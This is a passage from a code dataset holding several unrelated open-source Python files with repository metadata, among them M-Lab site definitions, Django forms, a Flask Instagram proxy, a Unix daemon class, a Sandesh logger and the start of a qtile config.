nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mia02','38.109.21.0', '2001:550:6c01::', 'Miami_FL', 'US', 25.783300, -80.266700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mia03','66.110.73.0', '2001:5a0:3801::', 'Miami_FL', 'US', 25.783300, -80.266700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mia04','173.205.3.128', '2001:668:1f:1f::', 'Miami_FL', 'US', 25.783300, -80.266700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mia05','128.177.109.0', '2001:438:fffd:29::', 'Miami_FL', 'US', 25.783300, -80.266700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mia06','4.71.210.192', '2001:1900:3001:a::', 'Miami_FL', 'US', 25.783300, -80.266700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mil02','80.239.222.0', '2001:2030:30::', 'Milan', 'IT', 45.464000, 9.191600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mil03','77.67.115.0', '2001:668:1f:62::', 'Milan', 'IT', 45.464000, 9.191600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mil04','213.242.77.128', '2001:1900:2200:af::', 'Milan', 'IT', 45.464000, 9.191600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mil05','195.89.147.0', '2001:5008:100:14::', 'Milan', 'IT', 45.464000, 9.191600, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mnl01','202.90.156.0', '2001:d18:0:35::', 'Manila', 'PH', 14.5086, 121.0194, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('mpm01','41.94.23.0', None, 'Maputo', 'MZ', -25.9208, 32.5725, user_list, count=4, arch='x86_64-r630', exclude=[1,2,3,4], nodegroup='MeasurementLabCentos', roundrobin=False), makesite('nbo01','197.136.0.64', '2c0f:fe08:10:64::', 'Nairobi', 'KE', -1.319170, 36.925800, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('nuq02','149.20.5.64', '2001:4f8:1:1001::', 'San Francisco Bay Area_CA', 'US', 37.383300, -122.066700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('nuq03','38.102.163.128', '2001:550:1502::', 'San Francisco Bay Area_CA', 'US', 37.383300, -122.066700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('nuq04','66.110.32.64', '2001:5a0:3e00::', 'San Francisco Bay Area_CA', 'US', 37.383300, -122.066700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('nuq06','128.177.109.128','2001:438:fffd:2d::', 'San Francisco Bay Area_CA', 'US', 37.383300, -122.066700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('nuq07','209.170.110.192','2001:2030:0:12::', 'San Francisco Bay Area_CA', 'US', 37.383300, -122.066700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ord02','38.65.210.192', '2001:550:1b01:1::', 'Chicago_IL', 'US', 41.978600, -87.904700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ord03','66.198.24.64', '2001:5a0:4200::', 'Chicago_IL', 'US', 41.978600, -87.904700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ord04','173.205.3.192', '2001:668:1f:20::', 'Chicago_IL', 'US', 41.978600, -87.904700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ord05','128.177.163.0', '2001:438:fffd:2f::', 'Chicago_IL', 'US', 41.978600, -87.904700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ord06','4.71.251.128', '2001:1900:3001:b::', 'Chicago_IL', 'US', 41.978600, -87.904700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('par02','212.73.231.192', '2001:4c08:2003:3f::', 'Paris', 'FR', 48.858400, 2.349010, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('par03','80.239.222.64', '2001:2030:35::', 'Paris', 'FR', 48.858400, 2.349010, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('par04','77.67.119.128', '2001:668:1f:6b::', 'Paris', 'FR', 48.858400, 2.349010, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('par05','195.89.147.192', '2001:5003:300:e::', 'Paris', 'FR', 48.858400, 2.349010, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('prg02','195.122.159.128','2001:4c08:2003:42::', 'Prague', 'CZ', 50.083300, 14.416700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('prg03','80.239.156.128', '2001:2030:31::', 'Prague', 'CZ', 50.083300, 14.416700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('prg04','77.67.114.128', '2001:668:1f:60::', 'Prague', 'CZ', 50.083300, 14.416700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('prg05','195.89.147.64', '2001:5016:100:3::', 'Prague', 'CZ', 50.083300, 14.416700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sea02','63.243.224.0', '2001:5a0:4400::', 'Seattle_WA', 'US', 47.448900, -122.309400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sea03','173.205.3.0', '2001:668:1f:1d::', 'Seattle_WA', 'US', 47.448900, -122.309400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sea04','4.71.157.128', '2001:1900:2100:16::', 'Seattle_WA', 'US', 47.448900, -122.309400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sea07','209.170.110.128','2001:2030:0:a::', 'Seattle_WA', 'US', 47.448900, -122.309400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sea08','38.102.0.64', '2001:550:3200:1::', 'Seattle_WA', 'US', 47.448900, -122.309400, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('sin01','180.87.97.64', '2405:2000:301::', 'Singapore', 'SG', 1.3550, 103.9880, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('svg01','81.167.39.0', '2a01:798:0:13::', 'Stavanger', 'NO', 58.876700, 5.63780, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('syd02','175.45.79.0', '2402:7800:0:12::', 'Sydney', 'AU', -33.946100, 151.177000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('syd03','203.5.76.128', '2001:388:d0::', 'Sydney', 'AU', -33.946100, 151.177000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('tgd01','213.149.127.0', '2a00:fe80:0:104::', 'Podgorica', 'ME', 42.107764, 18.761649, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('tnr01','41.188.12.64', None, 'Antananarivo', 'MG', -18.7969, 47.4788, user_list, exclude=[1,2,3,4], count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('tpe01','163.22.28.0', '2001:e10:6840:28::', 'Taipei', 'TW', 25.077800, 121.224000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('trn01','194.116.85.192', '2001:7f8:23:307::', 'Turin', 'IT', 45.200800, 7.649720, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), # old ipv6 2c0f:fab0:ffff:1000:: @ tun01 makesite('tun01','41.231.21.0', '2001:4350:3000:1::', 'Tunis', 'TN', 36.851600, 10.229100, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('vie01','213.208.152.0', '2a01:190:1700:38::', 'Vienna', 'AT', 48.269000, 16.410700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('wlg02','163.7.129.64', '2404:138:4009:1::', 'Wellington', 'NZ', -41.327200, 174.805000, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('yqm01','209.51.169.128', '2001:470:1:820::', 'Moncton', 'CA', 46.107332, -64.673830, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('yul02','216.66.14.64', '2001:470:1:48f::', 'Montreal', 'CA', 45.4576, -73.7497, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('yvr01','184.105.70.192', '2001:470:1:822::', 'Vancouver','CA', 49.190165, -123.183665, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('ywg01','184.105.55.64', '2001:470:1:81f::', 'Winnipeg', 'CA', 49.905996, -97.237332, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('yyc02','65.49.72.192', '2001:470:1:42c::', 'Calgary', 'CA', 51.1315, -114.0106, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('yyz02','216.66.68.128', '2001:470:1:70a::', 'Toronto', 'CA', 43.6767, -79.6306, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), # Site for M-Lab testing machines makesite('lga0t','4.14.159.64', '2001:1900:2100:2d::','New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64-r630', nodegroup='MeasurementLabCentos', roundrobin=True), makesite('lga1t','4.14.3.0', '2001:1900:2100:1::', 'New York_NY', 'US', 40.766700, -73.866700, user_list, count=4, arch='x86_64', nodegroup='MeasurementLabCentos', roundrobin=False), ]
m-lab/operator
plsync/sites.py
Python
apache-2.0
25,116
0.01067
# coding=utf-8 # 项目反应理论中的等级反应模型 from __future__ import division, print_function, unicode_literals from psy import Grm, data scores = data['lsat.dat'] grm = Grm(scores=scores) print(grm.em())
inuyasha2012/pypsy
demo/demo_grm.py
Python
mit
220
0
# Definition for an interval. class Interval: def __init__(self, s=0, e=0): self.start = s self.end = e class Solution: def eraseOverlapIntervals(self, intervals): """ :type intervals: List[Interval] :rtype: int """ if not intervals: return 0 intervals.sort(key=lambda i: (i.end, i.start)) kicks = 0 pre_end = intervals[0].end for it in intervals[1:]: if it.start < pre_end: kicks += 1 else: pre_end = it.end return kicks fn = Solution().eraseOverlapIntervals print(fn([Interval(*it) for it in [[1, 2], [2, 3], [3, 4], [1, 3]]])) print(fn([Interval(*it) for it in [[1, 2], [1, 2], [1, 2]]])) print(fn([Interval(*it) for it in [[1, 2], [2, 3]]]))
feigaochn/leetcode
p435_non_overlapping_intervals.py
Python
mit
823
0
from django import forms from django.utils.translation import ugettext_lazy as _ from django_summernote.widgets import SummernoteInplaceWidget from crispy_forms.helper import FormHelper from crispy_forms.layout import Submit from .models import Speaker, Program class EmailLoginForm(forms.Form): email = forms.EmailField( max_length=255, label='', widget=forms.TextInput(attrs={ 'placeholder': 'Email address', 'class': 'form-control', }) ) def clean(self): cleaned_data = super(EmailLoginForm, self).clean() return cleaned_data class SpeakerForm(forms.ModelForm): def __init__(self, *args, **kwargs): super(SpeakerForm, self).__init__(*args, **kwargs) self.helper = FormHelper() self.helper.add_input(Submit('submit', _('Submit'))) class Meta: model = Speaker fields = ('desc', 'info', ) widgets = { 'desc': SummernoteInplaceWidget(), } labels = { 'desc': _('Profile'), 'info': _('Additional information'), } class ProgramForm(forms.ModelForm): def __init__(self, *args, **kwargs): super(ProgramForm, self).__init__(*args, **kwargs) self.helper = FormHelper() self.helper.add_input(Submit('submit', _('Submit'))) class Meta: model = Program fields = ('slide_url', 'video_url', 'is_recordable', 'desc', ) widgets = { 'desc': SummernoteInplaceWidget(), } labels = { 'slide_url': _('Slide URL'), 'video_url': _('Video URL'), 'is_recordable': _('Photography and recording is allowed'), 'desc': _('Description'), }
pythonkr/pyconkr-2014
pyconkr/forms.py
Python
mit
1,760
0
from django.db import models from django.core.exceptions import MultipleObjectsReturned from expedient.clearinghouse.aggregate.models import Aggregate from expedient.common.permissions.shortcuts import must_have_permission from vt_plugin.models.VM import VM # Virtualization Plugin class class VtPlugin(Aggregate): ''' Virtualization Plugin that communicates the Virtualization Aggregate Manager with Expedient ''' # VT Aggregate information field information = "An aggregate of VT servers " class Meta: app_label = 'vt_plugin' verbose_name = "Virtualization Aggregate" client = models.OneToOneField('xmlrpcServerProxy', editable = False, blank = True, null = True) #def start_slice(self, slice): # super(VtPlugin, self).start_slice(slice) # try: # from vt_plugin.controller.dispatchers.GUIdispatcher import startStopSlice # startStopSlice("start",slice.uuid) # except: # raise def stop_slice(self, slice): super(VtPlugin, self).stop_slice(slice) try: from vt_plugin.controller.dispatchers.GUIdispatcher import startStopSlice startStopSlice("stop",slice.uuid) except: raise """ aggregate.remove_from_project on a VT AM will get here first to check that no slice inside the project contains VMs for the given aggregate """ def remove_from_project(self, project, next): # Check permission because it won't always call parent method (where permission checks) must_have_permission("user", self.as_leaf_class(), "can_use_aggregate") vms = self.resource_set.filter_for_class(VM).filter(vm__projectId=project.uuid) offending_slices = [] for vm in vms: offending_slices.append(str(vm.vm.getSliceName())) # Aggregate has VMs in slices -> stop slices and remove aggregate from there where possible if offending_slices: for slice in project.slice_set.all(): try: self.stop_slice(slice) self.remove_from_slice(slice, next) except: pass raise MultipleObjectsReturned("Please delete all VMs inside aggregate '%s' before removing it from slices %s" % (self.name, str(offending_slices))) # Aggregate has no VMs in slices (OK) -> delete completely from project (parent method) else: return super(VtPlugin, self).remove_from_project(project, next) """ aggregate.remove_from_slice on a VT AM will get here first to check that the slice does not contain VMs for the given aggregate """ def remove_from_slice(self, slice, next): # If any VM (created inside this slice) is found inside any server of the VT AM, warn if self.resource_set.filter_for_class(VM).filter(vm__sliceId=slice.uuid): raise MultipleObjectsReturned("Please delete all VMs inside aggregate '%s' before removing it" % str(self.name)) return super(VtPlugin, self).remove_from_slice(slice, next)
dana-i2cat/felix
expedient/src/python/plugins/vt_plugin/models/VtPlugin.py
Python
apache-2.0
3,112
0.008676
#!/usr/bin/env python """Script to split a large mediawiki file into multiple files, by header.""" import sys import re import os ADD_TOC = True # Add TOC everywhere? def usage(): print "Usage: [scriptname] [infilename]" if len(sys.argv) != 2: usage() exit() filename_in = sys.argv[1] if '.' in filename_in: filename_no_exts = filename_in[:filename_in.find('.')] else: filename_no_exts = filename_in # Match top-level headers only. header = re.compile(r"^=([^=]+)=") current_filename = '' # Set once we see a header, hyphenated current_filename_orig = '' # Original. current_text = '' # Build up the next file to write. file_in = open(filename_in, 'r') header_names = [] # list of (hyphenated, orig) file name pairs TOC_FILE = 'Home.mediawiki' # location of intro text before headers + TOC. def cap_firsts(s): s_caps = '' words = s.split(' ') for j, word in enumerate(words): words[j] = word[0].upper() + word[1:] return " ".join(words) first = True i = 0 for line in file_in.readlines(): m = header.match(line) if m: assert len(m.groups()) == 1 # dump string to file. if first: filename = TOC_FILE first = False else: filename = current_filename + '.mediawiki' f = open(filename, 'w') if ADD_TOC and not filename == TOC_FILE: f.write("__TOC__\n\n") f.write(current_text) f.close() current_text = '' # Who knows how Gollum/Mediawiki handle spaces. Convert to hyphens. current_filename_orig = cap_firsts(m.groups()[0].strip()) current_filename = current_filename_orig.replace(' ', '-') header_names.append((current_filename, current_filename_orig)) else: current_text += line i += 1 # Finish last file filename = current_filename + '.mediawiki' f = open(filename, 'w') f.write(current_text) f.close() print "processed %i lines" % i home_file = open('Home.mediawiki', 'a') # Dump out the header names to a Home.ext to form a TOC. for k, (hyphenated, orig) in enumerate(header_names): # Link | Page Title home_file.write("%i: [[%s|%s]]\n\n" % (k + 1, hyphenated, orig))
brandonheller/mediawiki_to_gollum
split_by_headers.py
Python
bsd-3-clause
2,218
0.002705
from flask import Flask, request, jsonify, abort import os import requests app = Flask(__name__) app.debug = os.getenv('DEBUG', '') == 'True' def access_token(): return os.getenv('ACCESS_TOKEN', '') def check_user_id(user_id): if user_id not in os.getenv('USER_IDS', ''): return abort(403) def check_user_name(user_name): if user_name not in os.getenv('USER_NAMES', ''): return abort(403) def perform_request(path): r = requests.get(path) response = jsonify(r.json(), status=202) response.headers.add('Access-Control-Allow-Origin', '*') return response def build_recent_images_url(user_id): return 'https://api.instagram.com/v1/users/' + user_id + '/media/recent/?access_token=' + access_token() def build_user_profile_url(user_id): return 'https://api.instagram.com/v1/users/' + user_id + '?access_token=' + access_token() def build_media_url(user_name): return 'https://www.instagram.com/' + user_name + '/media/' @app.route("/recent_images/<path:user_id>") def recent_images(user_id): check_user_id(user_id) return perform_request(build_recent_images_url(user_id)) @app.route("/user_profile/<path:user_id>") def user_profile(user_id): check_user_id(user_id) return perform_request(build_user_profile_url(user_id)) @app.route("/media/<path:user_name>") def media(user_name): check_user_name(user_name) return perform_request(build_media_url(user_name)) @app.route('/healthcheck') def healthcheck(): return 'WORKING' if __name__ == "__main__": app.run()
cyrilkyburz/bhwi_proxy
bhwi_proxy.py
Python
mit
1,516
0.019789
#!/usr/bin/env python # # Copyright 2013, 2014 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # import ConfigParser import sys import os import exceptions import re class volk_fft_modtool_config: def key_val_sub(self, num, stuff, section): return re.sub('\$' + 'k' + str(num), stuff[num][0], (re.sub('\$' + str(num), stuff[num][1], section[1][num]))); def verify(self): for i in self.verification: self.verify_section(i) def remap(self): for i in self.remapification: self.verify_section(i) def verify_section(self, section): stuff = self.cfg.items(section[0]) for i in range(len(section[1])): eval(self.key_val_sub(i, stuff, section)) try: val = eval(self.key_val_sub(i, stuff, section)) if val == False: raise exceptions.ValueError except ValueError: raise exceptions.ValueError('Verification function returns False... key:%s, val:%s'%(stuff[i][0], stuff[i][1])) except: raise exceptions.IOError('bad configuration... key:%s, val:%s'%(stuff[i][0], stuff[i][1])) def __init__(self, cfg=None): self.config_name = 'config' self.config_defaults = ['name', 'destination', 'base'] self.config_defaults_remap = ['1', 'self.cfg.set(self.config_name, \'$k1\', os.path.realpath(os.path.expanduser(\'$1\')))', 'self.cfg.set(self.config_name, \'$k2\', os.path.realpath(os.path.expanduser(\'$2\')))'] self.config_defaults_verify = ['re.match(\'[a-zA-Z0-9]+$\', \'$0\')', 'os.path.exists(\'$1\')', 'os.path.exists(\'$2\')'] self.remapification = [(self.config_name, self.config_defaults_remap)] self.verification = [(self.config_name, self.config_defaults_verify)] default = os.path.join(os.getcwd(), 'volk_fft_modtool.cfg') icfg = ConfigParser.RawConfigParser() if cfg: icfg.read(cfg) elif os.path.exists(default): icfg.read(default) else: print "Initializing config file..." icfg.add_section(self.config_name) for kn in self.config_defaults: rv = raw_input("%s: "%(kn)) icfg.set(self.config_name, kn, rv) self.cfg = icfg self.remap() self.verify() def read_map(self, name, inp): if self.cfg.has_section(name): self.cfg.remove_section(name) self.cfg.add_section(name) for i in inp: self.cfg.set(name, i, inp[i]) def get_map(self, name): retval = {} stuff = self.cfg.items(name) for i in stuff: retval[i[0]] = i[1] return retval
hamgravy/volk-fft
python/volk_fft_modtool/cfg.py
Python
gpl-3.0
3,621
0.005523
import sys, os, time, atexit from signal import SIGTERM, SIGKILL class Daemon: """ A generic daemon class. Usage: subclass the Daemon class and override the run() method """ def __init__(self, pidfile, stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'): self.stdin = stdin self.stdout = stdout self.stderr = stderr self.pidfile = pidfile def daemonize(self): """ do the UNIX double-fork magic, see Stevens' "Advanced Programming in the UNIX Environment" for details (ISBN 0201563177) http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16 """ try: pid = os.fork() if pid > 0: # exit first parent sys.exit(0) except OSError, e: sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror)) sys.exit(1) # decouple from parent environment os.chdir("/") os.setsid() os.umask(0) # do second fork try: pid = os.fork() if pid > 0: # exit from second parent sys.exit(0) except OSError, e: sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror)) sys.exit(1) # redirect standard file descriptors sys.stdout.flush() sys.stderr.flush() si = file(self.stdin, 'r') so = file(self.stdout, 'a+') se = file(self.stderr, 'a+', 0) os.dup2(si.fileno(), sys.stdin.fileno()) os.dup2(so.fileno(), sys.stdout.fileno()) os.dup2(se.fileno(), sys.stderr.fileno()) # write pidfile atexit.register(self.delpid) pid = str(os.getpid()) file(self.pidfile,'w+').write("%s\n" % pid) def delpid(self): os.remove(self.pidfile) def start(self): """ Start the daemon """ # Check for a pidfile to see if the daemon already runs try: pf = file(self.pidfile,'r') pid = int(pf.read().strip()) pf.close() except IOError: pid = None if pid: message = "pidfile %s already exist. Daemon already running?\n" sys.stderr.write(message % self.pidfile) sys.exit(1) # Start the daemon self.daemonize() self.run() def stop(self): """ Stop the daemon """ # Get the pid from the pidfile try: pf = file(self.pidfile,'r') pid = int(pf.read().strip()) pf.close() except IOError: pid = None if not pid: message = "pidfile %s does not exist. Daemon not running?\n" sys.stderr.write(message % self.pidfile) return # not an error in a restart # Try killing the daemon process try: while 1: os.kill(pid, SIGTERM) time.sleep(0.1) except OSError, err: err = str(err) if err.find("No such process") > 0: if os.path.exists(self.pidfile): os.remove(self.pidfile) else: print str(err) sys.exit(1) def kill(self): """ Force kill of daemon """ # Get the pid from the pidfile try: pf = file(self.pidfile,'r') pid = int(pf.read().strip()) pf.close() except IOError: pid = None if not pid: message = "pidfile %s does not exist. Daemon not running?\n" sys.stderr.write(message % self.pidfile) return # not an error in a restart # Try killing the daemon process try: while 1: os.kill(pid, SIGKILL) time.sleep(0.1) except OSError, err: err = str(err) if err.find("No such process") > 0: if os.path.exists(self.pidfile): os.remove(self.pidfile) else: print str(err) sys.exit(1) def restart(self): """ Restart the daemon """ self.stop() self.start() def run(self): """ You should override this method when you subclass Daemon. It will be called after the process has been daemonized by start() or restart(). """
marshallflax/NVDARemoteServer
daemon.py
Python
gpl-2.0
3,540
0.051695
"""pilvi URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.10/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin urlpatterns = [ url(r'^admin/', admin.site.urls), ]
prawn-cake/pilvi
pilvi/urls.py
Python
mit
762
0
import os, shutil if not os.path.isdir('Bin'): os.mkdir('Bin') if not os.path.isdir('Temp'): os.mkdir('Temp')
cprogrammer1994/Python-ComputeShader
Prepare.py
Python
gpl-3.0
121
0.024793
# # Copyright (c) 2013 Juniper Networks, Inc. All rights reserved. # # # Sandesh Logger # import logging import logging.config import logging.handlers from gen_py.sandesh.ttypes import SandeshLevel import sandesh_base_logger import util def create_logger(generator, logger_class, logger_config_file=None): l_class = util.import_class(logger_class) return l_class(generator, logger_config_file=logger_config_file) class SandeshConfigLogger(sandesh_base_logger.SandeshBaseLogger): """Sandesh Config Logger Implementation. This class sets the log config file to the python logging module. The user should define the log config file as per format defined in [1]. [1] https://docs.python.org/2/library/logging.config.html """ def __init__(self, generator, logger_config_file=None): super(SandeshConfigLogger, self).__init__(generator) logging.config.fileConfig(logger_config_file) self._logger = logging.getLogger(generator) class SandeshLogger(sandesh_base_logger.SandeshBaseLogger): """Sandesh Logger Implementation.""" _DEFAULT_LOG_FILE = '<stdout>' _DEFAULT_SYSLOG_FACILITY = 'LOG_LOCAL0' def __init__(self, generator, logger_config_file=None): assert generator, 'SandeshLogger init requires generator name' super(SandeshLogger, self).__init__(generator) self._generator = generator self._logger = logging.getLogger(self._generator) self._logger.setLevel( sandesh_base_logger.SandeshBaseLogger.get_py_logger_level( SandeshLevel.SYS_INFO)) if not len(self._logger.handlers): # add the handler only once self._logging_file_handler = logging.StreamHandler() log_format = logging.Formatter( '%(asctime)s [%(name)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') self._logging_file_handler.setFormatter(log_format) self._logger.addHandler(self._logging_file_handler) else: self._logging_file_handler = self._logger.handlers[0] # end __init__ def set_logging_params(self, enable_local_log=False, category='', level=SandeshLevel.SYS_INFO, file=_DEFAULT_LOG_FILE, enable_syslog=False, syslog_facility='LOG_LOCAL0', enable_trace_print=False, enable_flow_log=False): self.set_local_logging(enable_local_log) self.set_logging_category(category) self.set_logging_level(level) self.set_logging_file(file) self.set_logging_syslog(enable_syslog, syslog_facility) self.set_trace_print(enable_trace_print) self.set_flow_logging(enable_flow_log) # end set_logging_params def set_trace_print(self, enable_trace_print): if self.is_trace_print_enabled() != enable_trace_print: self._logger.info('SANDESH: Trace: PRINT: [%s] -> [%s]', self.is_trace_print_enabled(), enable_trace_print) super(SandeshLogger, self).set_trace_print(enable_trace_print) # end set_trace_print def set_flow_logging(self, enable_flow_log): if self.is_flow_logging_enabled() != enable_flow_log: self._logger.info('SANDESH: Flow Logging: [%s] -> [%s]', self.is_flow_logging_enabled(), enable_flow_log) super(SandeshLogger, self).set_flow_logging(enable_flow_log) # end set_flow_logging def set_logging_level(self, level): if isinstance(level, str): if level in SandeshLevel._NAMES_TO_VALUES: level = SandeshLevel._NAMES_TO_VALUES[level] else: level = SandeshLevel.SYS_INFO # get logging level corresponding to sandesh level try: logger_level = self._SANDESH_LEVEL_TO_LOGGER_LEVEL[level] except KeyError: logger_level = logging.INFO level = SandeshLevel.SYS_INFO self._logger.info('SANDESH: Logging: LEVEL: [%s] -> [%s]', SandeshLevel._VALUES_TO_NAMES[self.logging_level()], SandeshLevel._VALUES_TO_NAMES[level]) self._logger.setLevel(logger_level) super(SandeshLogger, self).set_logging_level(level) # end set_logging_level def set_logging_file(self, file): if self.logging_file() != file: self._logger.info('SANDESH: Logging: FILE: [%s] -> [%s]', self.logging_file(), file) self._logger.removeHandler(self._logging_file_handler) if file == self._DEFAULT_LOG_FILE: self._logging_file_handler = logging.StreamHandler() else: self._logging_file_handler = ( logging.handlers.RotatingFileHandler( filename=file, maxBytes=5000000, backupCount=10)) log_format = logging.Formatter( '%(asctime)s [%(name)s]: %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p') self._logging_file_handler.setFormatter(log_format) self._logger.addHandler(self._logging_file_handler) super(SandeshLogger, self).set_logging_file(file) # end set_logging_file def set_logging_syslog(self, enable_syslog, syslog_facility): if (self.is_syslog_logging_enabled() == enable_syslog and self.logging_syslog_facility() == syslog_facility): return if self.logging_syslog_facility() != syslog_facility: self._logger.info('SANDESH: Logging: SYSLOG: [%s] -> [%s]', self.logging_syslog_facility(), syslog_facility) if self.is_syslog_logging_enabled(): self._logger.removeHandler(self._logging_syslog_handler) if enable_syslog: self._logging_syslog_handler = logging.handlers.SysLogHandler( address="/dev/log", facility=getattr(logging.handlers.SysLogHandler, syslog_facility, logging.handlers.SysLogHandler.LOG_LOCAL0) ) self._logger.addHandler(self._logging_syslog_handler) super(SandeshLogger, self).set_logging_syslog(enable_syslog, syslog_facility) # end set_logging_syslog # end class SandeshLogger
toabctl/contrail-sandesh
library/python/pysandesh/sandesh_logger.py
Python
apache-2.0
6,516
0
# -*- coding: utf-8 -*- from libqtile.manager import Key, Click, Drag, Screen, Group from libqtile.command import lazy from libqtile import layout, bar, widget, hook from libqtile import xcbq xcbq.keysyms["XF86AudioRaiseVolume"] = 0x1008ff13 xcbq.keysyms["XF86AudioLowerVolume"] = 0x1008ff11 xcbq.keysyms["XF86AudioMute"] = 0x1008ff12 def window_sorter(win): patterns = ( ('Яндекс.Почта', 'E-mail'), ('Gmail', 'E-mail'), ('SquirrelMail', 'E-mail'), ('zeromq', 'Docs'), ('PyYAML', 'Docs'), ('documentation', 'Docs'), ('-ietf-', 'Docs'), ('GNOME Live!', 'Docs'), ('Guide', 'Docs'), ) for k, v in patterns: if k in win.name: return v mod = "mod4" keys = [ Key([mod], "j", lazy.layout.down()), Key([mod], "k", lazy.layout.up()), Key([mod, "shift"], "j", lazy.layout.move_down()), Key([mod, "shift"], "k", lazy.layout.move_up()), Key([mod, "control"], "j", lazy.layout.section_down()), Key([mod, "control"], "k", lazy.layout.section_up()), Key([mod], "h", lazy.layout.collapse_branch()), # for tree layout Key([mod], "l", lazy.layout.expand_branch()), # for 